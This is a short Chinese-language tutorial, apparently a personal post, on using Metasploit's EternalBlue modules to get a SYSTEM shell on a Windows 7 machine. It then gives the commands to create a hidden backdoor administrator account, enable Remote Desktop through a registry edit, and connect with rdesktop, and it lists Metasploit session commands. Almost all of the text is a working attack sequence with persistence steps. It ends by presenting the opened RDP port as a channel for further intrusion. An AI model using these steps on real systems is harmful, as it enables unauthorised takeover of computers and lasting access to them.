利用永恒之蓝漏洞实现w7远程操控 首先目标要关闭防火墙 然后打开Metasploit 输入永恒之蓝漏洞编码 复制运行第二条辅助项目 设置漏洞选项 运行项目,结果为有一个可能是漏洞的w7漏洞 然后选择第三个项目,即攻击项目,并设置漏洞选项 输入漏洞攻击命令 exploit 于是我们便进入了对方的w7命令终端,身份为最高权限者system(系统) 下一步我们输入命令net user 用户名 密码 /add来创建一个用户 然后用一个 net localgroup administrators 用户名 /add 命令来将刚才的用户拉入讨论组 然后输入命令 net localgroup administrators 查看管理员
输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 来开启远程桌面端口3389
/v 所选项之下要添加的值名。 /t RegKey 数据类型 /d 要分配给添加的注册表 ValueName 的数据。 /f 不用提示就强行覆盖现有注册表项。 现在我们就可以利用其他漏洞进行以远程桌面控制为渠道的渗透攻击了
sessions -l 列出会话 sessions -i <id>选择会话 sessions -k <id> 结束会话 <ctrl> z 把会话放在后台 <ctrl> c 结束会话
kali终端窗口 rdesktop 192.168.4.239:3389 远程连接命令